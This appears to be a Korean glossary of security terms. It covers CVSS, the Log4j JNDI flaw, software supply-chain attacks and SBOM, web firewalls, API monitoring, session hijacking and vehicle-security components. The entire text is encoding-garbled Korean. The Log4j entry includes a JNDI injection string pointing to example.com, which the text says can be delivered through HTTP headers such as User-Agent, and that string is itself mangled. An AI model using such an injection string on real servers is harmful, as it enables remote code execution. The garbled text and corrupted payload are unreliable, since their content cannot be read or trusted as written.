CVSS (Common Vulnerability Scoring System)
์ํํธ์จ์ด ์ทจ์ฝ์ ์ ํน์ฑ๊ณผ ์ฌ๊ฐ๋๋ฅผ ํ์ ํ๋ ๋ฐ ๋์์ด ๋๋ ๊ฐ๋ฐฉํ ํ๋ ์์ํฌ์ด๋ค. CVSS๋ฅผ ์ด์ฉํ๋ฉด ์กฐ์ง์ ํต์ผ๋ ๋ฑ๊ธ ๋ฐฉ์์ผ๋ก ์ฌ๋ฌ ์ํํธ์จ์ด์ ๊ฑธ์น IT ์ทจ์ฝ์ ์ ์ฌ๊ฐ๋๋ฅผ ํ๊ฐํ ์ ์๊ณ , CVSS ์ ์๋ฅผ ํตํด ์ฆ์ ๊ฐ์ ์ด ํ์ํ ์ทจ์ฝ์ ์ ์ฐ์ ์์๋ฅผ ๊ฒฐ์ ํ ์ ์๋ค.
Log4j
JNDI์ LDAP๋ฅผ ์ด์ฉํ ์ทจ์ฝ์ ์ด๋ค. JNDI๋ Java ํ๋ก๊ทธ๋จ์ด ๋๋ ํ ๋ฆฌ๋ฅผ ํตํด ๋ฐ์ดํฐ(Java ๊ฐ์ฒด ํํ)๋ฅผ ์ฐพ์ ์ ์๋๋ก ํ๋ ๋๋ ํ ๋ฆฌ ์๋น์ค์ด๋ค.
JNDI๋ ์ด๋ฌํ ๋๋ ํ ๋ฆฌ ์๋น์ค๋ฅผ ์ํด ๋ค์ํ ์ธํฐํ์ด์ค๊ฐ ์กด์ฌํ๋๋ฐ ๊ทธ ์ค ํ๋๊ฐ LDAP์ด๋ค.
Java ํ๋ก๊ทธ๋จ๋ค์ ์์ ๋งํ JNDI์ LDAP๋ฅผ ํตํด Java ๊ฐ์ฒด๋ฅผ ์ฐพ์ ์ ์๋ค. ์์๋ก URL ldap://localhost:389/o=JNDITutorial์ ์ ์ํ๋ค๋ฉด LDAP ์๋ฒ์์ JNDITutorial ๊ฐ์ฒด๋ฅผ ์ฐพ์ ์ ์๋ ๊ฒ์ด๋ค.
์ด๋ฌํ ์ ๊ทผ ์ธํฐํ์ด์ค๊ฐ ์ด๋ฒ ์ฌํ์ ์น๋ช
์ ์ด๊ฒ ๋ ์ด์ ๋, Log4j์๋ ํธ๋ฆฌํ๊ฒ ์ฌ์ฉํ๊ธฐ ์ํด ${prefix:name} ํ์์ผ๋ก Java ๊ฐ์ฒด๋ฅผ ๋ณผ ์ ์๊ฒ ํ๋ ๋ฌธ๋ฒ์ด ์กด์ฌํ๊ธฐ ๋๋ฌธ์ด๋ค. ์๋ฅผ ๋ค์ด ${java:version}์ ํ์ฌ ์คํ ์ค์ธ Java ๋ฒ์ ์ ๋ณผ ์ ์๊ฒ ํ๋ค.
์ด๋ฐ ๋ฌธ๋ฒ์ ๋ก๊ทธ๊ฐ ๊ธฐ๋ก๋ ๋๋ ์ฌ์ฉ์ด ๊ฐ๋ฅํ๊ณ , ๊ฒฐ๊ตญ ํด์ปค๊ฐ ๋ก๊ทธ์ ๊ธฐ๋ก๋๋ ๊ณณ์ ์ฐพ์ ${jndi:sndi:snd://example.com/a}๊ณผ ๊ฐ์ ๊ฐ์ ์ถ๊ฐํ๊ธฐ๋ง ํ๋ฉด ์ทจ์ฝ์ ์ ์ด์ฉํ ์ ์๋ ๊ฒ์ด๋ค. ์ด ๊ฐ์ ๋ฃ๋ ๋ฐฉ๋ฒ์ User-Agent์ ๊ฐ์ ์ผ๋ฐ์ ์ธ HTTP ํค๋์ผ ์๋ ์๊ณ ์ฌ๋ฌ๊ฐ์ง ๋ฐฉ๋ฒ์ด ์๋ค.
์ํํธ์จ์ด ๊ณต๊ธ๋ง ๊ณต๊ฒฉ
์ํํธ์จ์ด ๊ณต๊ธ๋ง(Supply Chain)์ ์ํํธ์จ์ด๊ฐ ๊ฐ๋ฐ์์ ์ํด ๊ฐ๋ฐ๋ ํ ์ฌ์ฉ์์๊ฒ ๋๋ฌํ๊ธฐ๊น์ง ์ฌ๋ฌ ๋จ๊ณ๋ก ๊ตฌ์ฑ๋๋ค. ๊ฐ๋ฐ์์ ๊ฐ๋ฐ ํ๊ฒฝ๋ถํฐ ์์ค ์ฝ๋ ์ ์ฅ์, ์ต์ข ์ํํธ์จ์ด๊ฐ ๋ฐฐํฌ๋๋ ํ๋ซํผ๊น์ง ํฌํจ๋ ์ ์์ผ๋ฉฐ, ์ด๋ฌํ ๊ณต๊ธ๋ง์ ๊ฐ ์ํํธ์จ์ด๋ฅผ ๊ฐ๋ฐํ๋ ์คํ์์ค ์ปค๋ฎค๋ํฐ์ ๊ฐ๋ฐ์ฌ, ๊ทธ๋ฆฌ๊ณ ์ํํธ ์จ์ด ํน์ฑ์ ๋ฐ๋ผ ๋ฌ๋ผ์ง ์ ์๋ค. ํนํ, ์คํ์์ค์ ๊ฒฝ์ฐ ์ฌ์ฌ์ฉ ๋น๋๊ฐ ๋์ ์ฌ์ ์ํํธ์จ์ด์ ๋นํด ๊ณต๊ธ๋ง์ด ๋ ๊ธธ์ด์ง ์ ์์ผ๋ฉฐ, ์ํธ ์ฌ์ฌ์ฉ์ผ๋ก ์ธํด ๋ณต์กํ ์์กด์ฑ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ํ ๋น๋ฒํ๊ฒ ๋ฐ์ํ๊ณ ์๋ค. IoT ๊ธฐ๊ธฐ๋ฅผ ์ด์ฉํ ๊ธ์ต ์๋น์ค์ ๊ฒฝ์ฐ๋ ๊ณต๊ธ๋ง์ด ๋์ฑ ๊ธธ์ด์ง ์ ์์ด์, [๊ทธ๋ฆผ 2]์ ์ฌ์ฉ์ ๋ถ๋ถ์ด ์ ์กฐ์ฌ, ์๋น์ค ์ ๊ณต์, ์ฌ์ฉ์๋ก 6๋จ๊ณ๋ก ๊ตฌ์ฑ ๋๋ค. ๊ณต๊ธ๋ง์ ๊ฐ ๋จ๊ณ๋ ๊ณต๊ฒฉ ๋ชฉํ์ง์ ์ด ๋ ์ ์์ผ๋ฉฐ, ๋ชจ๋ ๋จ๊ณ์ ๋ณดํธ๊ฐ ๋์ง ์์ผ๋ฉด ๊ณต๊ฒฉ์ด ๊ฐ๋ฅํด์ง๋ค.
SW ๊ณต๊ธ๋ง๋ณด์์ SW ๊ฐ๋ฐ๊ณผ์ ์์ ํฌํจ๋๋ ๋ค์ํ ๊ณต๊ฐ SW ๋ชฉ๋ก ๋ฑ ์ฃผ์ ๊ตฌ์ฑํ์ ๋ช
์ธ์์ธ SBOM(SW Bill of Materials) ๋ถ์์ ํตํด SW์ ํฌํจ๋ ๋ณด์ ์ทจ์ฝ์ ์ ๋ฐ๊ฒฌํ ์ ์์ผ๋ฉฐ, SW ์ ํต·์ด์๊ณผ์ ์์๋ ์ ๊ณต๋ ๋ช
์ธ์(SBOM, ์ดํ ‘SBOM’)์ ์ง์์ ์ธ ๋ถ์์ ํตํด SW ๋ณด์์ฑ์ ํ๋ณดํ ์ ์๋ค.
WAF
์น๋ฐฉํ๋ฒฝ(Web Application Firewall, WAF) ์ ์ผ๋ฐ์ ์ธ ๋คํธ์ํฌ ๋ฐฉํ๋ฒฝ (Firewall)๊ณผ๋ ๋ฌ๋ฆฌ ์น ์ ํ๋ฆฌ์ผ์ด์ ๋ณด์์ ํนํ๋์ด ๊ฐ๋ฐ๋ ์๋ฃจ์ ์ด๋ค.
์น๋ฐฉํ๋ฒฝ์ ๊ธฐ๋ณธ ์ญํ ์ SQL Injection, Cross-Site Scripting(XSS)๋ฑ๊ณผ ๊ฐ์ ์น ๊ณต๊ฒฉ์ ํ์งํ๊ณ ์ฐจ๋จํ๋ ๊ฒ์ด๋ค. ์น๋ฐฉํ๋ฒฝ์ ์ง์ ์ ์ธ ์น ๊ณต๊ฒฉ ๋์ ์ด ์ธ์๋, ์ ๋ณด์ ์ถ๋ฐฉ์ง์๋ฃจ์ , ๋ถ์ ๋ก๊ทธ์ธ๋ฐฉ์ง์๋ฃจ์ , ์น์ฌ์ดํธ์๋ณ์กฐ๋ฐฉ์ง์๋ฃจ์ ๋ฑ์ผ๋ก ํ์ฉ์ด ๊ฐ๋ฅํ๋ค.
API
API(์ ํ๋ฆฌ์ผ์ด์ ํ๋ก๊ทธ๋๋ฐ ์ธํฐํ์ด์ค)๋ ์ต์ ๊ธฐ์ ๋ฐ ๋น์ฆ๋์ค ์ธํ๋ผ์ ๊ธฐ๋ณธ ๊ตฌ์ฑ์์์ด๋ค. ๊ฐ์ฅ ๊ธฐ๋ณธ์ ์ธ ์์ค์์ API๋ ๋ ์ ํ๋ฆฌ์ผ์ด์ ์ด ์๋ก ํต์ ํ ์ ์๊ฒ ํ๋ ์ํํธ์จ์ด์ด๋ค. API๋ ์ฑ์ ์ฑ๊ณผ ์๋ฒ์ ์ฐ๊ฒฐํ๊ณ ์ฑ๊ณผ ์๋ฒ๋ฅผ ์๋น์์๊ฒ ์ฐ๊ฒฐํ๋ค.
(์ฐธ๊ณ ) API ๋ชจ๋ํฐ๋ง ๋๊ตฌ
ํธ๋ํฝ ๋ถ์
API ์๋ต ์ฑ๊ณต๋ฅ , ์ผ๋ฐ์ ์ธ ์ค๋ฅ ์ฝ๋, ์ด๋น ํธ๋์ญ์ ์ ๋ฑ์ ํธ๋ํฝ ๋ฐ ์ฌ์ฉ๋ ์ธก์ ํญ๋ชฉ์ ์ฐพ์ ๋ค์ํ ์ง์ญ์ ์ ๋ฐ์ ์ธ ํธ๋ํฝ์ ๋ถ์ํฉ๋๋ค.
ํธ๋ํฝ ๋ถ์ ๋๊ตฌ๋ ํธ๋ํฝ ์์ค๋ฅผ ์๋ณํ๊ณ ํธ๋ํฝ์ ์์ฑํ๋ ์ ํ๋ฆฌ์ผ์ด์ ์ ํ์ ํ ์ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด ๋ด, ๋ธ๋ผ์ฐ์ ๋๋ ๋ผ์ด๋ธ๋ฌ๋ฆฌ์์ ๋ฐ์ํ ํธ๋ํฝ์ธ๊ฐ? ํธ๋ํฝ์ ์ถ์ฒ๋ ์ด๋์ธ๊ฐ?๋ฅผ ํ์ ํฉ๋๋ค.
API ์ถ์ ๋ฐ ๊ด์ธก ๊ฐ๋ฅ์ฑ
API ๊ด๋ฆฌ ํ๋ซํผ์์ ์คํ๋๋ API ํ๋ก์์ ๋ฌธ์ ํด๊ฒฐ ๋ฐ ๋ชจ๋ํฐ๋ง์ ์ง์ํฉ๋๋ค. API ์ถ์ ์ ์ฌ์ฉํ๋ฉด API ํ๋ก์ ํ๋ฆ์ ํตํด ๊ฐ ๋จ๊ณ์ ์ธ๋ถ์ ๋ณด๋ฅผ ํ๋ก๋ธํ ์ ์์ผ๋ฉฐ, ๊ด์ธก ๊ฐ๋ฅ์ฑ์ ํตํด ๊ฐ๋ฐ์๋ ์ค์๊ฐ์ผ๋ก ์ํ๋๋ ๊ฐ ๋จ๊ณ์ ์ง์ฐ ์๊ฐ, ์ฑ๋ฅ, ์คํ์ ํ์ ํ๋ ๋ฐ ๋์์ด ๋ฉ๋๋ค.
์ฑ๋ฅ ๋ถ์
์ฑ๋ฅ ๋ถ์ ๋๊ตฌ๋ ์ง์ญ ๊ฐ API ์๋ต ์๊ฐ, ๋์ ์๋ต ์๊ฐ, ์ค๋ฅ ์๋ฅผ ์ธก์ ํ๋ฉด์ API ํ๋ก์ ๋ฐ ๋์์ ์ง์ฐ ์๊ฐ์ ํ์ธํ ์ ์์ต๋๋ค. API ์ฑ๋ฅ ๋ชจ๋ํฐ๋ง์ ํ๋ก์ ๋ฐ ๋์์ ์ค๋ฅ ์ฝ๋์ ์ค๋ฅ ๊ตฌ์ฑ์ ๋ถ์ํฉ๋๋ค.
๊ฐ์ฉ์ฑ ๋ฐ ์ฑ๋ฅ ๋ชจ๋ํฐ๋ง
API ๋ชจ๋ํฐ๋ง ๋๊ตฌ๋ ์ธ๋ถํ๋ ์์ค์ ์ธ๋ถ์ ๋ณด๋ก ์ ์ฒด ๊ฐ์น ์ฌ์ฌ์์ API์ ๊ฐ์ฉ์ฑ๊ณผ ์ฑ๋ฅ์ ์ถ์ ํฉ๋๋ค. ๋ชจ๋ํฐ๋ง ๋๊ตฌ๋ ๊ฐ๋ฐ์ ์ ํ๋ฆฌ์ผ์ด์ , ํ๋ก์ ๋ ์ด์ด ๋๋ ๋ฐฑ์๋ ๋์ ๋ชจ๋์์ ์ค๋ฅ์ ์์ธ์ ์๋ณํ์ฌ ์ค๋ฅ๊ฐ ๋ฐ์ํ ๋ ์๋ฆผ์ ์์ฑํ๊ณ ํด๊ฒฐ ์๊ฐ์ ์ค์ผ ์ ์์ต๋๋ค.
๊ฐ๋ฐ์ ์ฐธ์ฌ
API ๋ชจ๋ํฐ๋ง ๋๊ตฌ๋ ๊ฐ๋ฐ์๊ฐ API์ ์ํธ์์ฉํ๋ ๋ฐฉ์๋ ๋ถ์ํ ์ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด ๊ฐ์ฅ ๋ง์ API ํธ๋ํฝ์ ์์ฑํ๋ ๊ฐ๋ฐ์๋ ๋๊ตฌ์ธ๊ฐ? ๊ฐ๋ฐ์๊ฐ API๋ฅผ ์ด๋ป๊ฒ ์ฌ์ฉํ๊ณ ์๋๊ฐ? ๊ฐ๋ฐ์ ํฌํธ์์ ๋ฌธ์๋ฅผ ์ฝ์๋?๋ฅผ ๋ถ์ํฉ๋๋ค.
๋ณด์ ์ํ
API ๊ด๋ฆฌ ํ๋ซํผ์ ์ฃผ์ ๊ธฐ๋ฅ ์ค ํ๋๋ API์ ๋ฐ์ดํฐ๋ฅผ ์ ์์ ์ธ ํ์์๋ก๋ถํฐ ๋ณดํธํ๋ ๊ฒ์ด๋ฏ๋ก API ๋ชจ๋ํฐ๋ง ๋๊ตฌ๋ ํญ์ API ์ํ๊ณ์ ์ํ, ์ ์์ ์ธ ํ๋, ์ ๋ฐ์ ์ธ ๋ณด์ ์ํ๋ฅผ ์ค์บํด์ผ ํฉ๋๋ค.
๋ณด์ ๋ชจ๋ํฐ๋ง ๋๊ตฌ์์ API ๊ตฌ์ฑ์ ๊ฒํ ํ์ฌ API๊ฐ ๋น์ฆ๋์ค์ ๋ณด์ ์ ์ฑ ๋ฐ ๊ท์ ์ค์ ์๊ตฌ์ฌํญ์ ์ค์ํ๋์ง ํ์ธํ ์ ์์ด์ผ ํฉ๋๋ค. ๋ํ ํธ๋ํฝ ํจํด์ ์ด์์น๋ฅผ ์๋ณํ๊ณ , ๋ณด์ ํธ๋ํฝ๊ณผ ์ ์ฌ์ ์ธ ์ํ์ ๊ตฌ๋ณํ๋ฉฐ, ๊ฐ๋ฐ์ ์ ๋ณด, trace ์ธ์ , API ํค์ ๊ฐ์ ๋ฏผ๊ฐํ ์ ๋ณด์ ์ก์ธ์คํ๊ณ ๋ด๋ณด๋ด๋ ์ฌ์ฉ์๋ฅผ ํ์ ํ ์ ์์ด์ผ ํฉ๋๋ค.
Session Hijacking Attack
์ธ์ (Session)์ ์ฌ์ฉ์์ ์ปดํจํฐ, ๋๋ ๋ ๋์ ์ปดํจํฐ ๊ฐ์ ํ์ฑํ๋ ์ํ๋ฅผ ๋งํ๋ค.
์ธ์ ํ์ด์ฌํน์ ์์คํ ๊ฐ ์ฐ๊ฒฐ์ด ํ์ฑํ๋ ์ํ, ์ฆ ๋ก๊ทธ์ธ๋ ์ํ๋ฅผ ๊ฐ๋ก์ฑ๋ ๊ฒ์ ๋ปํ๋ค.
์ธ์ ํ์ด์ฌํน์ ์์คํ ์ ์ ๊ทผํ ์ฌ์ฉ์์ ์์ด๋์ ํจ์คํธ์๋๋ฅผ ๋ชจ๋ฅผ ๊ฒฝ์ฐ ๊ณต๊ฒฉ ๋์์ด ์ด๋ฏธ ์์คํ ์ ์ ์๋์ด ์ธ์ ์ด ์ฐ๊ฒฐ๋์ด ์๋ ์ํ๋ฅผ ๊ฐ๋ก์ฑ๊ธฐ ํ๋ ๊ณต๊ฒฉ์ผ๋ก ์์ด๋์ ํจ์ค์๋๋ฅผ ๋ชฐ๋ผ๋ ์์คํ ์ ์ ๊ทผํ์ฌ ์์์ด๋ ๋ฐ์ดํฐ๋ฅผ ์ฌ์ฉํ ์ ์๋ ๊ณต๊ฒฉ์ ๋งํ๋ค.
ํ ๋ง๋๋ก ๊ณต๊ฒฉ์๊ฐ ์ธ์ฆ ์์ ๋ฑ์ด ์๋ฃ๋ ์ ์์ ์ผ๋ก ํต์ ํ๊ณ ์๋ ๋ค๋ฅธ ์ฌ์ฉ์์ ์ธ์ ์ ๊ฐ๋ก์ฑ์ ๋ณ๋์ ์ธ์ฆ ์์ ์ ๊ฑฐ์น์ง ์๊ณ ๊ฐ๋ก์ฑ ์ธ์ ์ผ๋ก ํต์ ์ ๊ณ์ํ๋ ํ์์ด๋ค.
์ฐจ๋ ๋ณด์ 6๊ฐ์ง
1. AFW (Application Firewall, ์ดํ๋ฆฌ์ผ์ด์ ๋ฐฉํ๋ฒฝ)
์๋์ฐจ์ฉ AFW๋ ์๋์ฐจ ํต์ ํ๋กํ ์ฝ์ ์ต์ ํ๋ ์ดํ๋ฆฌ์ผ์ด์ ๋ฐฉํ๋ฒฝ์ด๋ค. ์ฐจ๋ ์ธ๋ถ์์ ์ ์ ๋๋ ์ ์ฑ ํต์ ๋ฟ ์๋๋ผ ์ฐจ๋ ๋ด๋ถ์์ ๋ฐ์ํ๋ ๋น์ ์์ ํต์ ๋ด์ฉ๊น์ง ๋ชจ๋ ๋ถ์ํ๊ณ ๋์ํ๋ค. ๋ฏธ๋ ์๋์ฐจ์ ์๊ตฌ์ฌํญ์ ์ถฉ์กฑํ๊ธฐ ์ํ ๊ฐ๋ฐ ํํธ๋์ญ ‘AUTOSAR (AUTomotive Open System Architecture, ๊ฐ๋ฐฉํ ์๋์ฐจ ํ์ค ์ํํธ์จ์ด ๊ตฌ์กฐ)’์ ํ์ค์์๋ ์ด ํ์๋ฅผ ‘Firewall(๊ฒฝ๋ก์ ์ด)’์ ‘IDS(์นจ์ ํ์ง)’๋ก ๋๋ ์ ์ค๋ช ํ๋๋ฐ, AFW๋ Firewall ๊ทธ๋ฆฌ๊ณ IDS์ ๊ธฐ๋ฅ์ ๋ชจ๋ ๋ค ์ ๊ณตํ๋ ๊ธฐ์ ๋ก ์ดํดํ๋ฉด ๋๋ค.
์๋์ฐจ์ฉ AFW ๊ธฐ์ ์ ์์ด ๊ฐ์ฅ ์ค์ํ ํ๋จ๊ธฐ์ค์ ์ง๋ฅํ ๊ธฐ์ ์ด๋ ์๋๋์ ์ฐจ์ด๋ค. ์ง๊ธ๋ ์ดํ๋ฆฌ์ผ์ด์ ๊ณต๊ฒฉ์ ๋ถ์ผ๋ฅผ ๊ฐ๋ฆฌ์ง ์๊ณ ๋ชจ๋ ์ ๋ณด๋ณด์ ๊ณต๊ฒฉ์ ์ ๋์ ๋ค์๋ฅผ ์ฐจ์งํ๋ค. ๊ทธ๋ฆฌ๊ณ ์ปค๋ฅํฐ๋์นด๊ฐ ์์ ํ ์ค์ฉํ ๊ทธ๋ฆฌ๊ณ ๋์คํ๋ ๊ทผ๋ฏธ๋ ์์ ์ ์ดํ๋ฆฌ์ผ์ด์ ๊ณต๊ฒฉ์ ์์ ์ง๊ธ๊ณผ๋ ๋น๊ต๋ ํ ์ ์์ ์ ๋๋ก ํจ์ฌ ๋ ๋ง์์ง ๊ฒ์ด๋ค. ๊ทธ๋ ๊ฒ ๋๋ฉด ํต์ ๋ด์ฉ์ ์ด๋ฏธ ์๋ ค์ง ๊ณต๊ฒฉ์ ๋ชฉ๋ก๊ณผ ์ผ์ผ์ด ๋์กฐํ๋ฉฐ ์ํ์ฑ์ ํ๋ณํ๋ ๊ธฐ์กด์ ์๊ทธ๋์ฒ ๋ฐฉ์ ๋ฐฉ๋ฒ๋ก ์ผ๋ก๋ ์ ์๋ฌด๋ฆฌ ์ด์ฌํ ๋ง์ผ๋ ค ํด๋ ๋์ ํ ๋ง์ ๋ผ ์๊ฐ ์๋ค. ๋ฐ๋ผ์ ํต์ ๋ด์ฉ์ ๋ ผ๋ฆฌ๋ฅผ ๋ถ์ํ์ฌ ๊ธฐ์กด ๊ณต๊ฒฉ ์ธ ๋ณ์ข ๊ณต๊ฒฉ๊ณผ ์์ง ์ ์ฒด๊ฐ ๋ฐํ์ง์ง ์์ ์๋ก์ด ๊ณต๊ฒฉ๊น์ง ํ์งํ๊ณ ๋ฐฉ์ดํ๋ ์ง๋ฅํ ์์ง ํ์ฌ ์ฌ๋ถ๊ฐ AFW์ ๊ฐ์ฅ ์ค์ํ ํ๋จ๊ธฐ์ค์ด๋ผ ํ ์ ์๋ค.
2. V2X (Vehicle to Anything-Infra/Vehicle/Device, ์๋์ฐจ-์ฌ๋ฌผ ํต์ )
V2X๋ ์ฐจ๋๊ณผ ์ฐจ๋ ‘V2V’, ์ฐจ๋๊ณผ ์ธํ๋ผ ‘V2I’, ์ฐจ๋๊ณผ ๋จ๋ง๊ธฐ ‘V2D’ ๊ฐ์ ํต์ ์ ์ด์นญํ๋ ์ฉ์ด๋ค. V2X๋ ์ฐจ๋๊ณผ ์ฐจ๋ ์์ ์์ ๊ด๋ จ๋ ๋ชจ๋ ๋ฏผ๊ฐํ ์ ๋ณด๋ฅผ ์ด๋ง๋ผํ๋ ํต์ ์ด๊ธฐ ๋๋ฌธ์, V2X ๊ธฐ์ ์ ํต์ฌ์ ์ฌ์ฉ์ ์ธ์ฆ๊ณผ ๋ฐ์ดํฐ ์ํธํ ์์คํ ์ด๋ค. ๊ทธ๋ฆฌ๊ณ ์๋์ฐจ๋ ์ฐ์ ์ ํน์ฑ ์ ํ ๋๋ผ ๋ด์์์ฅ์์๋ง ํ๋งค๋์ง ์๊ณ ์ธ๊ณ์์ฅ์ ๊ณ ๋ คํด ์ ์๋์ด์ผ ํ๊ธฐ ๋๋ฌธ์ ๊ตญ์ ํ์ค๊ท๊ฒฉ ์ค์๊ฐ ํต์ฌ์ด๋ค.
V2X ํต์ ๋ณด์ ํ์ค๊ท๊ฒฉ์ผ๋ก๋ ‘IEEE1609.2’ ๊ทธ๋ฆฌ๊ณ ‘CAMP VSC3’ ๋ฑ์ด ์๋ค. ‘IEEE1609.2’๋ ์๋์ฐจ ํ๊ฒฝ์์์ ๋ฌด์ ํต์ ํ์ค์ธ ‘WAVE (Wireless Access in Vehicular Environments)’ ๊ด๋ จ ํ์ค์ผ๋ก์, ์ฐจ๋์ด ๋ค๋ฅธ ์ฐจ๋์ด๋ ์ธ๋ถ ์์คํ ๊ณผ์ ๋ฌด์ ํต์ ์ ์ค์ํด์ผ ํ ๋ณด์๊ท๊ฒฉ์ด๋ค. ‘CAMP VSC3 (Crash Avoidance Metrics Partnership Vehicle Safety Communications 3)’๋ ์๋์ฐจํ์ฌ์ ๊ด๋ จ ๊ธฐ๊ด๋ค์ด ์ฐธ์ฌํด ๊ตฌ์ฑํ ์ปจ์์์ CAMP์์ ๋ง๋ ๋ณด์๊ท๊ฒฉ์ผ๋ก์,ํฌ๋, GM, ํผ๋ค, ํ ์ํ, ํ๋๊ธฐ์ ๋ฑ ์ธ๊ณ ์ ์์ ์๋์ฐจํ์ฌ๋ค์ด ๋๊ฑฐ ์ฐธ์ฌํ๊ณ ์๋ค. ์ธ์ฆ๊ณผ ์ํธํ ๊ด๋ จํด์๋CAMP VSC3 ๊ท๊ฒฉ์ ํ์ ํ KMS์ PKI ๊ธฐ์ ์ฌ์ฉ์ ์๊ฒฉํ ๊ท์ ํ๊ณ ์๋ค.
3. KMS (Key Management System, ์๋ณตํธํ ํค ๊ด๋ฆฌ ์์คํ )
KMS๋ ์ธ์ฆ์๋ฅผ ํฌํจํ ์๋ณตํธํ ํค์ ์์ฑ๊ณผ ํ๊ธฐ ๋ฑ ํค์ ์์ ์ฃผ๊ธฐ๋ณ ๊ด๋ฆฌ ๋ฐ ์์ ํ ๋ณด๊ด์ ์ํ ์์คํ ์ด๋ค. ์ธ๋ถํต์ ๋ฟ ์๋๋ผ ์ฐจ๋ ๋ด๋ถ ECU(Electronic Control Unit) ํต์ ์ ์ํ ํค ๊ด๋ฆฌ ๋ฐ ์์ ํ ์ ์ฅ, ์ ๊ทผ์ ์ด ๋ฐ ๊ถํ ๊ด๋ฆฌ๋ฅผ ํตํ ํค ์ค๋จ์ฉ ๋ฐ ๋์ฉ ๋ฐฉ์ง ๋ฑ์ ๊ธฐ๋ฅ์ ๋งก์ ์๋์ฐจํต์ ์ฒด๊ณ ์ ์ฒด๋ฅผ ์์ ํ๊ฒ ์ ์งํ๋ค.
์๋์ฐจ๋ณด์์์๋ฟ๋ง ์๋๋ผ KMS๋ ๋ชจ๋ ๋ฐ์ดํฐ ์ํธํ ์์คํ ์ ํต์ฌ์ด๋ค. ํํ ์ ๋ณด๋ฅผ ์ํธํํ๊ธฐ๋ง ํ๋ฉด ์์ ํ๋ค๊ณ ์๊ฐํ์ง๋ง, ๋ณตํธํ ํค๋ฅผ ํ์ทจ๋นํ๋ฉด ์ํธ๋ฌธ์ ์ธ์ ๋ ํ๋ฌธ์ผ๋ก ๋ฐ๋ ์ ์์ผ๋ฏ๋ก ์์ ํ์ง ์๋ค. ๋ฐ๋ผ์ ๋ฐ์ดํฐ ์ํธํ ์์คํ ์ด๋ ์ฆ ์๋ณตํธํ ํค ๊ด๋ฆฌ ์์คํ ์ด๋ผ๊ณ ์ดํดํ๋ ๊ฒ์ด ๊ทผ๋ณธ์ ์ธ ๋์์ ์ค์ฉ์ ์ธ ํด์์ด๋ค. ๋ฐ๋ผ์ KMS๋ ์ด๋ค ์ํธํ ์ ํ์ ๋ํ ํ๋จ๊ธฐ์ค์ด ๋๊ธฐ๋ ํ๋ค. ์ํธํ ์ ํ๊ณผ ์ฐ๊ณ๋ KMS์ ์ฑ๋ฅ๊ณผ ํจ์จ์ ๊ธฐ์ค์ผ๋ก ์ ํ ๋์ ์ ๊ฒฐ์ ํ๋ ๊ฒ์ ์๋ชป๋ ์ ํ์ผ๋ก ์ธํ ํผํด๋ฅผ ๋ง์ ์ ์๋ ๊ฐ์ฅ ํ๋ช ํ ๋ฐฉ๋ฒ์ด๋ค. ์๋์ฐจ KMS ๋ํ ๋ง์ฐฌ๊ฐ์ง๋ค.
4. PKI (Public Key Infrastructure, ๊ณต๊ฐ ํค ์ธํ๋ผ)
ํ๋์ ์๋์ฐจ๋ ์ฌ์ฌ๋ก์ด ๋ฌผ๊ฑด์ด์ง๋ง ์ฌ๋ฌ ์๋์ฐจ๊ฐ ๋ชจ์ด๋ฉด ๊ตํต์ ์์, ์ฆ ๊ณต๊ณต๋ฌผ์ ์ผ๋ถ๊ฐ ๋๋ค. PKI๋ ์๋์ฐจ๊ฐ ์๋์ฐจ ํ ๋๋ก ๊ทธ์น์ง ์๊ณ ๊ตญ๊ฐ ์ธํ๋ผ์ ์ผ๋ถ๋ก์ ์์ฉํ๊ธฐ ๋๋ฌธ์ ํ์ํ ์์คํ ์ด๋ค. PKI๋ ์ฐจ๋์ฉ ์ธ์ฆ์๋ฅผ ์์ฑํ๊ณ ์ด์ํ๊ณ ๊ด๋ฆฌํ๋ฉฐ, ๊ตํต๊ด๋ฆฌ ์์คํ ์ PKI๋ฅผ ํตํด ๊ฐ๊ฐ ์๋์ฐจ์ ์กด์ฌ๋ฅผ ๊ณต์ ์ผ๋ก ์ธ์ํ๋ค.
ํ์ง๋ง ํํ ์คํดํ๋ ๋ฐ์๋ ๋ฌ๋ฆฌ ์ด๋ ์ฌ์ํ ์นจํด์๋ ๋ฌด๊ดํ๊ณ ๋ ๋ฌด๊ดํด์ผ๋ง ํ๋ค. ๊ทธ๋ฌํ๊ธฐ ์ํด์ PKI์๋ ์ด์ ์์ ํ๋ผ์ด๋ฒ์๋ฅผ ๋ณดํธํ๊ธฐ ์ํ ์ต๋ช ํ ๊ธฐ์ ์ ํฌํจํ๊ณ ์๋ค. ์ฃผ์ ๊น๊ฒ ๊ด์ฐฐํด์ผ ํ ์ง์ ์ด๋ค. ๊ทธ๋ฆฌ๊ณ ์ฐจ๋์ฉ PKI ์์คํ ๋ํ ๋ค๋ฅธ ์ฌํ ๊ธฐ์ ๊ณผ ๋ง์ฐฌ๊ฐ์ง๋ก ๊ตญ์ ํ์ค์ ์๊ฒฉํ ์ค์ํ๋์ง ์ฌ๋ถ๋ฅผ ๋ณด๊ณ ํ๋จํ๋ฉด ๋๋๋ฐ, ํนํ IEEE1609.2 ํ์ค์ ๋ฐ๋ฅด๋์ง๋ฅผ ์ดํด๋ณธ๋ค. ๊ทธ๋ฆฌ๊ณ ์ฐจ๋์ฉ ์์คํ ์ด๊ธฐ ๋๋ฌธ์ ๊ฐ๋ฐ ์ ๊ณ ๋์ ๊ฒฝ๋ํ ๊ณต์ ์ด ์ ์ฉ๋๋๋ฐ ํน์ ๊ทธ์ ๋ฐ๋ฅธ ์์คํ ์ฑ๋ฅ์ด๋ ํจ์จ ๋ฌธ์ ๋ ์๋์ง ๋ฑ์ ๋์ฌ๊ฒจ๋ณด๋ฉด ์ ์ ํ๊ณ ์์ ํ ์์คํ ์ ์ ํํ ์ ์๋ค.
5. ITS (Intelligent transportation system, ์ง๋ฅํ ๊ตํต ์์คํ )
